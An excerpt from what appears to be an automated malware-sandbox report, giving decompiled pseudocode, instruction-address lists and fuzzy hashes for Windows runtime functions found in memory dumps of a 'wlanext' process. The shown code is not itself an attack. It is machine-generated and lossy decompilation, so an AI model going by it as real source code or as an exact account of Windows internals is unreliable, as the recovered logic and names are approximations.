                                  0x0351fc0f
                                  0x0351fc15
                                  0x0351fc23
                                  0x0351fc23
                                  0x0351fc25
                                  0x0351fc27
                                  0x0351fc75
                                  0x0351fc7c
                                  0x0351fc84
                                  0x00000000
                                  0x0351fc29
                                  0x0351fc29
                                  0x0351fc2d
                                  0x0351fc30
                                  0x0355bf0f
                                  0x00000000
                                  0x0351fc36
                                  0x0351fc38
                                  0x0351fc3b
                                  0x0351fc41
                                  0x0355bf17
                                  0x0355bf19
                                  0x0355bf48
                                  0x0355bf4b
                                  0x00000000
                                  0x0355bf1b
                                  0x0355bf22
                                  0x0355bf24
                                  0x0355bf26
                                  0x00000000
                                  0x0355bf2c
                                  0x0355bf37
                                  0x0355bf39
                                  0x0355bf3b
                                  0x00000000
                                  0x0355bf41
                                  0x0355bf41
                                  0x0355bf41
                                  0x0355bf41
                                  0x0355bf45
                                  0x00000000
                                  0x0355bf45
                                  0x0355bf3b
                                  0x0355bf26
                                  0x00000000
                                  0x0351fc47
                                  0x0351fc47
                                  0x0351fc49
                                  0x0351fcb2
                                  0x0351fcb4
                                  0x0351fcb6
                                  0x0351fcdc
                                  0x0351fcdc
                                  0x00000000
                                  0x0351fcb8
                                  0x0351fcc3
                                  0x0351fcc5
                                  0x0351fcc7
                                  0x00000000
                                  0x0351fcc9
                                  0x0351fcc9
                                  0x0351fccd
                                  0x00000000
                                  0x0351fccd
                                  0x0351fcc7
                                  0x00000000
                                  0x0351fc4b
                                  0x0351fc4b
                                  0x0351fc4e
                                  0x0351fc4e
                                  0x0351fc51
                                  0x0351fc51
                                  0x0351fc54
                                  0x0351fc5a
                                  0x0351fc5c
                                  0x0351fc5f
                                  0x0351fc61
                                  0x0351fc63
                                  0x0351fc65
                                  0x0351fc67
                                  0x0351fc6e
                                  0x0351fc72
                                  0x0351fc72
                                  0x0351fc72
                                  0x0351fc72
                                  0x0351fc67
                                  0x0351fc61
                                  0x00000000
                                  0x0351fc5a
                                  0x0351fc49
                                  0x0351fc41
                                  0x0351fc30
                                  0x0351fc27
                                  0x0351fc03
                                  0x0351fbcd
                                  0x0351fbd3
                                  0x0351fbd9
                                  0x0351fbdc
                                  0x0351fbde
                                  0x0351fc99
                                  0x0351fc9b
                                  0x0351fc9d
                                  0x0351fcd5
                                  0x0351fcd5
                                  0x0351fc89
                                  0x0351fc89
                                  0x00000000
                                  0x0351fc9f
                                  0x0351fc9f
                                  0x0351fca3
                                  0x00000000
                                  0x0351fca3
                                  0x00000000
                                  0x0351fbe4
                                  0x0351fbe4
                                  0x0351fbe4
                                  0x0351fbe4
                                  0x0351fbe9
                                  0x0351fbf2
                                  0x00000000
                                  0x0351fbf2
                                  0x0351fbde
                                  0x0351fbcb
                                  0x0351fbab
                                  0x0351fc8b
                                  0x0351fc8b
                                  0x0351fc8c
                                  0x0351fb80
                                  0x0351fb72
                                  0x0351fb5e
                                  0x0351fc8d
                                  0x0351fc91
                                  0x0351fadf
                                  0x0351fadf
                                  0x0351fae1
                                  0x0351fae4
                                  0x0351fae7
                                  0x0351faec
                                  0x0351faf8
                                  0x0351fb00
                                  0x0351fb07
                                  0x0351fb0f
                                  0x0351fb0f
                                  0x0351fb07
                                  0x00000000
                                  0x0351faf8
                                  0x0351fadd

                                  Strings
                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0355BE0F
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                  • API String ID: 0-865735534
                                  • Opcode ID: 87492223ce74f27f5e02cb90ec5fd31348e04664bb72bca11a5a092fd8271c32
                                  • Instruction ID: 0477cf7762ed4a726e04b09ddf319b8f252135593393c89b1be8bfebaba23ab6
                                  • Opcode Fuzzy Hash: 87492223ce74f27f5e02cb90ec5fd31348e04664bb72bca11a5a092fd8271c32
                                  • Instruction Fuzzy Hash: 0AA11575B047068FEB24DF68E454B7AB3B4BF48714F08466EE902DB6B0DB34E8418B80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E034E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x35d5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x35d7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E035297C0();
				}
				if( *0x35d79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x35d79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03511624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03507D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0357FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03529520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0351E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0353DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x35d6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x35d6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03529980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E035295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03507D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03507D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03567016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0357FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x35d5350;
							if(_t109 != 0x35d5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0357FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03575720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                  0x034e2d8a
                                  0x034e2d8a
                                  0x034e2d92
                                  0x034e2d96
                                  0x034e2d9e
                                  0x034e2da0
                                  0x034e2da3
                                  0x034e2da5
                                  0x034e2da8
                                  0x034e2dab
                                  0x034e2db2
                                  0x0353f9aa
                                  0x0353f9ab
                                  0x0353f9ae
                                  0x0353f9ae
                                  0x034e2db8
                                  0x034e2dc2
                                  0x0353f9b9
                                  0x0353f9be
                                  0x0353f9bf
                                  0x0353f9bf
                                  0x034e2dcf
                                  0x0353f9c9
                                  0x034e2dd5
                                  0x034e2dd5
                                  0x034e2dd5
                                  0x034e2dde
                                  0x034e2de1
                                  0x034e2e70
                                  0x034e2e72
                                  0x034e2e72
                                  0x034e2de7
                                  0x034e2deb
                                  0x034e2e7c
                                  0x034e2e83
                                  0x034e2e85
                                  0x034e2e8b
                                  0x034e2e8d
                                  0x034e2e92
                                  0x034e2e92
                                  0x034e2e85
                                  0x034e2df1
                                  0x034e2df7
                                  0x034e2df9
                                  0x034e2df9
                                  0x034e2dfc
                                  0x034e2dff
                                  0x034e2e02
                                  0x00000000
                                  0x034e2e05
                                  0x034e2e0c
                                  0x0353f9d9
                                  0x034e2e12
                                  0x034e2e12
                                  0x034e2e12
                                  0x034e2e1a
                                  0x0353f9e3
                                  0x0353f9e9
                                  0x0353f9f0
                                  0x0353f9f6
                                  0x0353f9f8
                                  0x0353f9f8
                                  0x0353f9f0
                                  0x034e2e23
                                  0x0353fa02
                                  0x0353fa03
                                  0x0353fa05
                                  0x0353fa06
                                  0x00000000
                                  0x034e2e29
                                  0x034e2e29
                                  0x034e2e2e
                                  0x034e2e34
                                  0x034e2e3e
                                  0x00000000
                                  0x00000000
                                  0x034e2e44
                                  0x034e2e47
                                  0x034e2e4d
                                  0x00000000
                                  0x00000000
                                  0x034e2e4f
                                  0x034e2e54
                                  0x00000000
                                  0x00000000
                                  0x034e2e5a
                                  0x034e2e5f
                                  0x034e2e9a
                                  0x034e2ea4
                                  0x034e2ea5
                                  0x034e2ea8
                                  0x034e2eaf
                                  0x034e2eb2
                                  0x034e2eb5
                                  0x0353fae9
                                  0x0353faeb
                                  0x0353faed
                                  0x0353faef
                                  0x0353faf7
                                  0x0353faf8
                                  0x0353fafd
                                  0x0353faff
                                  0x0353fb04
                                  0x0353fb04
                                  0x0353faff
                                  0x034e2ec0
                                  0x034e2ec4
                                  0x034e2ec6
                                  0x034e2ec8
                                  0x0353fb14
                                  0x0353fb18
                                  0x0353fb1e
                                  0x0353fb21
                                  0x0353fb21
                                  0x034e2ece
                                  0x034e2ece
                                  0x034e2ece
                                  0x034e2ed7
                                  0x034e2e61
                                  0x034e2e63
                                  0x0353fa6b
                                  0x0353fa71
                                  0x0353fa76
                                  0x0353fa78
                                  0x0353fa8a
                                  0x0353fa7a
                                  0x0353fa83
                                  0x0353fa83
                                  0x0353fa8f
                                  0x0353fa91
                                  0x0353fa97
                                  0x0353fa9d
                                  0x0353faa4
                                  0x0353faaa
                                  0x0353faaf
                                  0x0353fab1
                                  0x0353fac3
                                  0x0353fab3
                                  0x0353fabc
                                  0x0353fabc
                                  0x0353fac8
                                  0x0353facb
                                  0x0353fadf
                                  0x0353fadf
                                  0x0353facb
                                  0x0353faa4
                                  0x0353fa91
                                  0x034e2e6f
                                  0x034e2e6f
                                  0x034e2e5f
                                  0x0353fa13
                                  0x0353fa15
                                  0x0353fa17
                                  0x0353fa1f
                                  0x0353fa21
                                  0x0353fa22
                                  0x0353fa25
                                  0x0353fa28
                                  0x0353fa2f
                                  0x0353fa2f
                                  0x0353fa2a
                                  0x0353fa2a
                                  0x0353fa2a
                                  0x0353fa31
                                  0x0353fa34
                                  0x0353fa36
                                  0x0353fa3c
                                  0x0353fa3e
                                  0x0353fa41
                                  0x0353fa43
                                  0x0353fa45
                                  0x0353fa45
                                  0x0353fa41
                                  0x0353fa3c
                                  0x0353fa4a
                                  0x0353fa4f
                                  0x0353fa51
                                  0x0353fa53
                                  0x0353fa56
                                  0x0353fa5b
                                  0x0353fa5e
                                  0x00000000
                                  0x0353fa5e
                                  0x034e2e23

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Re-Waiting
                                  • API String ID: 0-316354757
                                  • Opcode ID: a3301974653aea2b3e2ad8e459ad60adb417e8713d0853a5bbdd0fbb9072ce04
                                  • Instruction ID: 96add0a5cd6d84ccc4a8a33cd11a0a5e58f3f29e14c3c7f7f3fc8e3b4d44a00b
                                  • Opcode Fuzzy Hash: a3301974653aea2b3e2ad8e459ad60adb417e8713d0853a5bbdd0fbb9072ce04
                                  • Instruction Fuzzy Hash: 95613831E006159FDB31EF68E840B7EB7B9FB4A714F180AAAD8119F3E0C7B499018795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E035B0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E035AFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E035B1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03529730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E035AA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E035AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x35d8b04 >> 0x14) + (_v44 -  *0x35d8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03507D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E035A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03507D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0359FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x35d8724 & 0x00000008) != 0) {
						E035A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E035B15B5(0x35d8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                  0x035b0eb7
                                  0x035b0eb9
                                  0x035b0ec0
                                  0x035b0ec2
                                  0x035b0ecd
                                  0x035b105b
                                  0x035b105b
                                  0x035b1061
                                  0x035b1066
                                  0x035b1066
                                  0x035b106b
                                  0x035b1073
                                  0x035b1073
                                  0x035b0ed3
                                  0x035b0ed6
                                  0x035b0edc
                                  0x035b0ee0
                                  0x035b0ee7
                                  0x035b0ef0
                                  0x035b0ef5
                                  0x035b0efa
                                  0x035b0efc
                                  0x035b0efd
                                  0x035b0f03
                                  0x035b0f04
                                  0x035b0f06
                                  0x035b0f07
                                  0x035b0f09
                                  0x035b0f0e
                                  0x035b0f14
                                  0x035b0f23
                                  0x035b0f2d
                                  0x035b0f34
                                  0x035b0f34
                                  0x035b0f14
                                  0x035b0f52
                                  0x00000000
                                  0x00000000
                                  0x035b0f58
                                  0x035b0f73
                                  0x035b0f74
                                  0x035b0f79
                                  0x035b0f7d
                                  0x035b0f80
                                  0x035b0f86
                                  0x035b0fab
                                  0x035b0fb5
                                  0x035b0fc6
                                  0x035b0fd1
                                  0x035b0fe3
                                  0x035b0fd3
                                  0x035b0fdc
                                  0x035b0fdc
                                  0x035b0feb
                                  0x035b1009
                                  0x035b1009
                                  0x035b1015
                                  0x035b1027
                                  0x035b1017
                                  0x035b1020
                                  0x035b1020
                                  0x035b102f
                                  0x035b103c
                                  0x035b103c
                                  0x035b1048
                                  0x035b1050
                                  0x035b1050
                                  0x035b1055
                                  0x00000000
                                  0x035b1055
                                  0x035b0f88
                                  0x035b0f9e
                                  0x035b0fa2
                                  0x035b0fa9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035b0fa9
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: f9422b08a741ab302d92743a36c88b67df9dae5c52f0c9c605d46339cfd68bd4
                                  • Instruction ID: be5ab38a34bcbf4b38d0cfc40dae3664c70663bfefb78a2ed05336590d504dab
                                  • Opcode Fuzzy Hash: f9422b08a741ab302d92743a36c88b67df9dae5c52f0c9c605d46339cfd68bd4
                                  • Instruction Fuzzy Hash: 0551AA712047429BD364DF29E894B5BB7F5FBC4304F08092CF9968B2A0D731E906CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E0351F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03504120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03529830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03529990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E035295D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xb42bc81a
							_t109 = L03504620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000b42b
								E0352F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000b42b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E035295D0();
										L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                  0x0351f0d3
                                  0x0351f0d9
                                  0x0351f0e0
                                  0x0351f0e7
                                  0x0351f0f2
                                  0x0351f0f4
                                  0x0351f0f8
                                  0x0351f100
                                  0x0351f108
                                  0x0351f10d
                                  0x0351f115
                                  0x0351f116
                                  0x0351f11f
                                  0x0351f123
                                  0x0351f124
                                  0x0351f12c
                                  0x0351f130
                                  0x0351f134
                                  0x0351f13d
                                  0x0351f144
                                  0x0351f14b
                                  0x0351f152
                                  0x0355bab0
                                  0x0355bab0
                                  0x0351f158
                                  0x0351f158
                                  0x0351f15a
                                  0x0351f160
                                  0x0351f165
                                  0x0351f166
                                  0x0351f16f
                                  0x0351f173
                                  0x0355baa7
                                  0x0355baa7
                                  0x0355baab
                                  0x00000000
                                  0x0351f179
                                  0x0351f179
                                  0x0351f18d
                                  0x0351f191
                                  0x0355baa2
                                  0x00000000
                                  0x0351f197
                                  0x0351f19b
                                  0x0351f1a2
                                  0x0351f1a9
                                  0x0351f1af
                                  0x0351f1b2
                                  0x0351f1b6
                                  0x0351f1b9
                                  0x0351f1c0
                                  0x0351f1c4
                                  0x0351f1d8
                                  0x0351f1df
                                  0x0351f1e3
                                  0x0351f1e6
                                  0x0351f1eb
                                  0x0351f1ee
                                  0x0351f1f4
                                  0x0351f20f
                                  0x0355bab7
                                  0x0355babb
                                  0x0355bacc
                                  0x0355bad1
                                  0x0351f215
                                  0x0351f218
                                  0x0351f226
                                  0x0351f22b
                                  0x00000000
                                  0x0351f22b
                                  0x0351f1f6
                                  0x0351f1f6
                                  0x0351f1f9
                                  0x0351f1fb
                                  0x0351f1fb
                                  0x0351f1f4
                                  0x0351f191
                                  0x0351f173
                                  0x0351f152
                                  0x0351f203

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                  • Instruction ID: 3915aa56545bfffeb521bf20949e9251e92bb69b5735276c8ce56adf019069a6
                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                  • Instruction Fuzzy Hash: 94517075504711AFD321DF15D840A67BBF8FF88710F004A2EF9959B6A0E774E914CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03563540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E03563540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x35dd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03520BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03563706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0352FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03563540;
						E0352FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0353DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03570C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E035297C0();
					}
					return E0352B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03563971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03563884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0352FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03529650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03563787(_a4,  &_v352, _t80);
						}
					}
